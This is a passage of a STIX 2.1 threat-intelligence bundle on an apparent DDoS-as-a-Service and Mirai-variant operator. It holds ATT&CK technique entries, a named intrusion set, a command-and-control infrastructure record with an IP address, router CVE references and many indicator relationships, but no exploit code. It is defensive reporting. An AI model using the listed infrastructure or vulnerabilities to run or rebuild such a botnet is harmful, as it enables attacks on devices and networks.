"attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b1f2e4be-8bd7-50f4-9b12-8ff5a814d239", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.910382Z", "modified": "2026-06-16T16:01:05.910382Z", "name": "Web Protocols", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1071/001", "external_id": "T1071.001" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--030bfe25-492a-5e3f-aad5-1c799345aa06", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.910498Z", "modified": "2026-06-16T16:01:05.910498Z", "name": "Non-Application Layer Protocol", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1095", "external_id": "T1095" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--88e2313f-cf2a-59dc-8124-88e46e53b1c4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.910617Z", "modified": "2026-06-16T16:01:05.910617Z", "name": "Symmetric Cryptography", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1573/001", "external_id": "T1573.001" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8bd25a7b-1b65-5b61-9080-4b05d2ce7541", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.910735Z", "modified": "2026-06-16T16:01:05.910735Z", "name": "Internal Proxy", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1090/001", "external_id": "T1090.001" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ab386774-9556-5bc2-8927-6d98193000ec", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.910852Z", "modified": "2026-06-16T16:01:05.910852Z", "name": "Standard Encoding", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1132/001", "external_id": "T1132.001" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--06cbe52b-abcb-5b54-a3ec-c553a82c7374", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.910968Z", "modified": "2026-06-16T16:01:05.910968Z", "name": "Exfiltration Over C2 Channel", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1041", "external_id": "T1041" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9b061dc5-a41f-538c-9521-8e98984351d2", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.911119Z", "modified": "2026-06-16T16:01:05.911119Z", "name": "Direct Network Flood", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1498/001", "external_id": "T1498.001" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e5cb41d1-15ac-5c86-bb7b-64f8f3e980ed", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.911241Z", "modified": "2026-06-16T16:01:05.911241Z", "name": "Reflection Amplification", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1498/002", "external_id": "T1498.002" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cf20d2c8-8603-5de7-9ff7-6907e88212b9", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.91136Z", "modified": "2026-06-16T16:01:05.91136Z", "name": "Endpoint Denial of Service", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1499", "external_id": "T1499" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "intrusion-set", "spec_version": "2.1", "id": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.911487Z", "modified": "2026-06-16T16:01:05.911487Z", "name": "UTA-2026-014", "description": "UTA-2026-014 (English-speaking HYBRID AI-augmented solo-or-small-team operator running Discord-fronted DDoS-as-a-Service + downstream Pandora-Mirai variant deployment)", "confidence": 60, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "infrastructure", "spec_version": "2.1", "id": "infrastructure--214ad0bb-f57a-5827-96bd-39f62c91516a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.9116Z", "modified": "2026-06-16T16:01:05.9116Z", "name": "rovodev-mirai-matrix-c2-87.106.143.220 infrastructure", "infrastructure_types": [ "command-and-control", "hosting" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "vulnerability", "spec_version": "2.1", "id": "vulnerability--33d26914-f594-5da5-a6e5-24b04ab9a05c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.912372Z", "modified": "2026-06-16T16:01:05.912372Z", "name": "CVE-2014-8361", "external_references": [ { "source_name": "cve", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-8361", "external_id": "CVE-2014-8361" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "vulnerability", "spec_version": "2.1", "id": "vulnerability--a6691a02-8776-5d2e-b9b0-50d95ffd1dce", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.912551Z", "modified": "2026-06-16T16:01:05.912551Z", "name": "CVE-2017-17215", "external_references": [ { "source_name": "cve", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-17215", "external_id": "CVE-2017-17215" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "vulnerability", "spec_version": "2.1", "id": "vulnerability--4d56e7a3-38a5-5c89-a858-26018e1d0119", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.912681Z", "modified": "2026-06-16T16:01:05.912681Z", "name": "CVE-2017-6077", "external_references": [ { "source_name": "cve", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6077", "external_id": "CVE-2017-6077" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--73c5e769-5821-5fb9-a341-75a9b0d2ae8d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.913448Z", "modified": "2026-06-16T16:01:05.913448Z", "relationship_type": "indicates", "source_ref": "indicator--32bf839a-9a7a-5a3f-816e-5d26483fa081", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b6df5c41-a4d9-558f-8960-5bb35288454c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.913563Z", "modified": "2026-06-16T16:01:05.913563Z", "relationship_type": "indicates", "source_ref": "indicator--768f0cb9-19e4-5bda-9830-8d87db5c607d", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e7cff098-dab2-575a-92ba-d2b63d46aa33", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.913661Z", "modified": "2026-06-16T16:01:05.913661Z", "relationship_type": "indicates", "source_ref": "indicator--cdf8c0d6-6aa3-532e-8abf-bb23054c5f1d", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--aa96a485-1f10-5770-8912-980c39d56503", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.913759Z", "modified": "2026-06-16T16:01:05.913759Z", "relationship_type": "indicates", "source_ref": "indicator--b4313750-aee2-5fc7-92a7-1a89e3d1dd2f", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--38054beb-aaeb-5bec-897b-232bba654e9f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.913859Z", "modified": "2026-06-16T16:01:05.913859Z", "relationship_type": "indicates", "source_ref": "indicator--8737e33a-5b28-547f-baaf-be90b91aa2f8", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ad61ae69-a281-5b92-9667-5b6e54c1d590", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.913954Z", "modified": "2026-06-16T16:01:05.913954Z", "relationship_type": "indicates", "source_ref": "indicator--5722181f-9fb4-51ae-8ba4-a415b9f0e834", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ab7f9e77-db01-5412-81b5-7a039a539aed", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.914054Z", "modified": "2026-06-16T16:01:05.914054Z", "relationship_type": "indicates", "source_ref": "indicator--ba38d13b-6806-5a58-aaaa-41d9be22ba5f", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4dfcc3f8-5f2e-5222-b4a2-cabef3af442c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.914152Z", "modified": "2026-06-16T16:01:05.914152Z", "relationship_type": "indicates", "source_ref": "indicator--b128780c-e2b5-5998-9956-641264f20055", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b0253e43-fb8a-5fa9-96b5-e984b693f09e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.914248Z", "modified": "2026-06-16T16:01:05.914248Z", "relationship_type": "indicates", "source_ref": "indicator--45e08149-7ac9-5e5f-85aa-cd33ce4b0e0e", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b0d8a163-1c0f-5098-b5c8-771772cfc3c1", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.914344Z", "modified": "2026-06-16T16:01:05.914344Z", "relationship_type": "indicates", "source_ref": "indicator--8f837c37-150c-5e17-b85e-27d954ee8430", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4773a54d-71a0-56fe-9c5a-96c81ea42d30", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.914439Z", "modified": "2026-06-16T16:01:05.914439Z", "relationship_type": "indicates", "source_ref": "indicator--ccea46d2-2993-52e4-a4b7-47fd822f3f79", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a50455a8-4634-5529-84e0-8847510c2911", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.914534Z", "modified": "2026-06-16T16:01:05.914534Z", "relationship_type": "indicates", "source_ref": "indicator--668538c9-ab04-5b1e-a503-3e2dfd859f97", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0fd294f2-07d6-5bcc-91b7-d71c21caed0d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.91463Z", "modified": "2026-06-16T16:01:05.91463Z", "relationship_type": "indicates", "source_ref": "indicator--12ab0f05-aa85-5c82-9ebe-87fad88050eb", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--8d0d8ad8-efff-517d-91e4-916fbfab5c86", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.914724Z", "modified": "2026-06-16T16:01:05.914724Z", "relationship_type": "indicates", "source_ref": "indicator--f3018267-421c-5c53-8002-307a664afe58", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2adbb0f0-7700-555b-958d-ec5ac66196a2", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.91482Z", "modified": "2026-06-16T16:01:05.91482Z", "relationship_type": "indicates", "source_ref": "indicator--0c7f700f-207c-52eb-b9a4-1da7ab6c0cea", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--782612fe-6e29-5f9d-b1b6-215dd508f4a5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.914916Z", "modified": "2026-06-16T16:01:05.914916Z", "relationship_type": "indicates", "source_ref": "indicator--e1b7710d-03f6-5fb4-8823-60fdacc4f3a8", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--96a357fe-e9aa-5901-98ff-da66a91aa9f5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.915012Z", "modified": "2026-06-16T16:01:05.915012Z", "relationship_type": "indicates", "source_ref": "indicator--52e696b3-871b-57f0-b29e-03a290c61dbb", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--492a9196-916b-54f9-8b3a-9e67d09d2127", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.915119Z", "modified": "2026-06-16T16:01:05.915119Z", "relationship_type": "indicates", "source_ref": "indicator--efc3a16c-5802-58c5-a7c0-4b8d08357547", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4d364ba3-de98-5d19-a6d7-53edad0e7cff", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.915216Z", "modified": "2026-06-16T16:01:05.915216Z", "relationship_type": "indicates", "source_ref": "indicator--12e844b5-16cf-584c-8e52-c26622bef2d6", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9e9fa600-0a5f-5630-8115-65ecd17d8e13", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.915311Z", "modified": "2026-06-16T16:01:05.915311Z", "relationship_type": "indicates", "source_ref": "indicator--752fd330-6706-51cd-9388-18f058ef0f74", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--68e8db71-8089-522c-b36c-9f94a6628360", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.915407Z", "modified": "2026-06-16T16:01:05.915407Z", "relationship_type": "indicates", "source_ref": "indicator--ff494eb7-7965-5ae9-8ae6-7727f8d9d55a", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--78471bb4-c374-5cc0-83a5-899db359b243", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.915502Z", "modified": "2026-06-16T16:01:05.915502Z", "relationship_type": "indicates", "source_ref": "indicator--67d16aa4-60f8-5825-bf58-e1ec29eafb0b", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--837d915b-150c-5abd-b966-82662aa3e493", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.915597Z", "modified": "2026-06-16T16:01:05.915597Z", "relationship_type": "indicates", "source_ref": "indicator--251d96df-50fa-59f5-8c38-9d118063ab2b", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0b5cd3cf-0725-545b-a715-6f414f13cfd6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.915693Z", "modified": "2026-06-16T16:01:05.915693Z", "relationship_type": "indicates", "source_ref": "indicator--f0e65d04-21b2-5c35-b6bd-03929fa608ca", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0b4c5682-ce27-548d-a52a-8758441f7188", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.915789Z", "modified": "2026-06-16T16:01:05.915789Z", "relationship_type": "indicates", "source_ref": "indicator--cf770c04-8077-5831-8a34-3856e3734c20", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b792c0e6-5775-532c-8ae3-691cfae49420", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.915883Z", "modified": "2026-06-16T16:01:05.915883Z", "relationship_type": "indicates", "source_ref": "indicator--bb4bd80d-2ce8-5d20-91ed-d048c70ce2f4", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--20e5667e-ec30-534a-ba1a-166c1eb714e2", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.915979Z", "modified": "2026-06-16T16:01:05.915979Z", "relationship_type": "indicates", "source_ref": "indicator--8d7a6416-59fa-54ff-b023-7be84e2fa3fb", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a064df39-d30c-59ee-9e44-a870abbe0ff9", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.916079Z", "modified": "2026-06-16T16:01:05.916079Z", "relationship_type": "indicates", "source_ref": "indicator--7f1f011b-a5e3-5390-9197-47506c84c148", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e587365b-699d-503c-8e41-d1684c5022ce", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.916174Z", "modified": "2026-06-16T16:01:05.916174Z", "relationship_type": "indicates", "source_ref": "indicator--eae8b01b-12e2-53d0-8086-463ccacf210d", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--cfc05f71-12b7-531e-80c4-90309bbc92da", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.916268Z", "modified": "2026-06-16T16:01:05.916268Z", "relationship_type": "indicates", "source_ref": "indicator--6dd72edc-d426-59e0-bfa6-786fd09c7066", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a0fef761-6109-5c88-b444-94022b7c45b5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.916363Z", "modified": "2026-06-16T16:01:05.916363Z", "relationship_type": "indicates", "source_ref": "indicator--3caf9842-74d2-54be-830e-279641463f85", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--fb2d61ae-4d74-5fb8-8dfd-dd386168d11f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.916457Z", "modified": "2026-06-16T16:01:05.916457Z", "relationship_type": "indicates", "source_ref": "indicator--b5edd3d6-548e-50e6-b560-01578db3b113", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--d9998112-1cac-5cfb-98de-d628c00840dc", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.916552Z", "modified": "2026-06-16T16:01:05.916552Z", "relationship_type": "indicates", "source_ref": "indicator--1db870aa-d146-5e1a-ac3e-0e2278763572", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--48d15190-bacd-5a2b-ae5a-e7c748deb02b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.916646Z", "modified": "2026-06-16T16:01:05.916646Z", "relationship_type": "indicates", "source_ref": "indicator--cc3f380d-3be9-5c85-a6a2-0e61e9947461", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a85745eb-11f2-5736-ac8d-2122c6221553", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.916741Z", "modified": "2026-06-16T16:01:05.916741Z", "relationship_type": "indicates", "source_ref": "indicator--11971737-7145-51a3-aa91-758c1786accc", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--48d374c5-fa15-5914-8842-295d6017e625", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.916835Z", "modified": "2026-06-16T16:01:05.916835Z", "relationship_type": "indicates", "source_ref": "indicator--1de8572f-2eec-5f52-94e0-72c0699dcc66", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c27c978b-9563-53c2-9b5b-00f505ccbf36", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.916929Z", "modified": "2026-06-16T16:01:05.916929Z", "relationship_type": "indicates", "source_ref": "indicator--0ca74fef-4a2d-5938-b239-55e83dcf00b9", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4dfb3518-00c2-5ae5-9ae8-6f231cf01d95", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.917032Z", "modified": "2026-06-16T16:01:05.917032Z", "relationship_type": "indicates", "source_ref": "indicator--0ca2f1e7-7096-5c1e-a459-8d519800b3f7", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--86c449b0-9878-5b1e-a2c9-6096b32181c4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.917131Z", "modified": "2026-06-16T16:01:05.917131Z", "relationship_type": "indicates", "source_ref": "indicator--ea46ebd6-e86b-5bc7-9816-26048fd4b8a2", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--33a99ab4-4d28-5606-9dc5-50533b9ac65f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.917226Z", "modified": "2026-06-16T16:01:05.917226Z", "relationship_type": "indicates", "source_ref": "indicator--42a898b0-8b4d-5135-9be9-4d0d7add2ba5", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b0b05606-cbe8-57f0-955c-587fbb3e33bd", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.917321Z", "modified": "2026-06-16T16:01:05.917321Z", "relationship_type": "indicates", "source_ref": "indicator--316051bb-937d-5a1e-ab0d-0c575e5e14e6", "target_ref": 